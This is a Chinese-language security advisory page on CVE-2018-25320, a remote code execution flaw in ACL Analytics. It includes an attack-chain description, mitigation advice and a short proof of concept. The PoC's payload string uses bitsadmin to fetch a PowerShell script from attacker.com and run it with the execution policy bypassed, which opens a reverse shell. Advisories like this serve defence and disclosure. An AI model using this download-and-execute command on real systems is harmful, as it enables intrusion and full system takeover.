CVE-2018-25320 CVSS 9.8 严重

CVE-2018-25320 ACL Analytics远程代码执行漏洞

披露日期: 2026-05-17

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25320

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ACL Analytics

漏洞概述

ACL Analytics 11.x至13.0.0.579版本存在严重的任意代码执行漏洞。攻击者无需认证即可利用EXECUTE函数，通过bitsadmin下载恶意PowerShell脚本并以系统权限执行，从而建立反向shell，完全控制系统。

技术细节

该漏洞的核心在于ACL Analytics的EXECUTE函数缺乏严格的输入验证和权限控制。攻击者可以通过网络向受影响的服务发送特制的命令字符串。利用过程中，攻击者利用EXECUTE函数调用Windows系统的bitsadmin工具，从远程服务器下载恶意的PowerShell脚本到本地。随后，脚本以SYSTEM权限被执行，从而在目标机器上开启反向Shell连接。这允许攻击者完全接管受影响的系统，执行任意系统命令，造成机密性、完整性和可用性的全面破坏。

攻击链分析

STEP 1

发现与侦察

攻击者扫描网络，识别出运行ACL Analytics 11.x至13.0.0.579版本的目标主机。

STEP 2

漏洞利用

攻击者向目标发送特制请求，利用EXECUTE函数执行系统命令，无需用户交互和认证。

STEP 3

载荷投递

利用EXECUTE函数调用bitsadmin工具，从远程服务器下载恶意的PowerShell脚本文件到目标系统。

STEP 4

执行与控制

以SYSTEM权限执行下载的PowerShell脚本，建立反向Shell连接，获取目标系统的完全控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2018-25320
# Concept: Leveraging EXECUTE function to run bitsadmin and powershell

# Malicious command string to be sent via vulnerable EXECUTE function
# This downloads a payload and executes it
payload_command = "EXECUTE 'cmd /c bitsadmin /transfer job /download /priority normal http://attacker.com/shell.ps1 C:\\users\\public\\shell.ps1 && powershell -ExecutionPolicy Bypass -File C:\\users\\public\\shell.ps1'"

print(f"Sending payload: {payload_command}")
# Note: This requires a vulnerable ACL Analytics instance listening for commands.

影响范围

ACL Analytics 11.x

ACL Analytics 12.x

ACL Analytics 13.0.0.579及更早版本

防御指南

临时缓解措施

建议立即将ACL Analytics升级至官方最新版本以修复此漏洞。若无法立即升级，应严格限制对该软件的网络访问，仅允许可信IP连接，并在主机层面部署EDR解决方案，监控bitsadmin和PowerShell的异常进程创建行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2018-25320
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2018-25320
3 Details https://www.cvedetails.com/cve/CVE-2018-25320/
4 VulDB https://vuldb.com/cve/CVE-2018-25320
5 Link https://www.acl.com
6 Link https://www.acl.com/products/acl-analytics/
7 Link https://www.exploit-db.com/exploits/44281
8 Link https://www.vulncheck.com/advisories/acl-analytics-11-x-arbitrary-code-execution

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表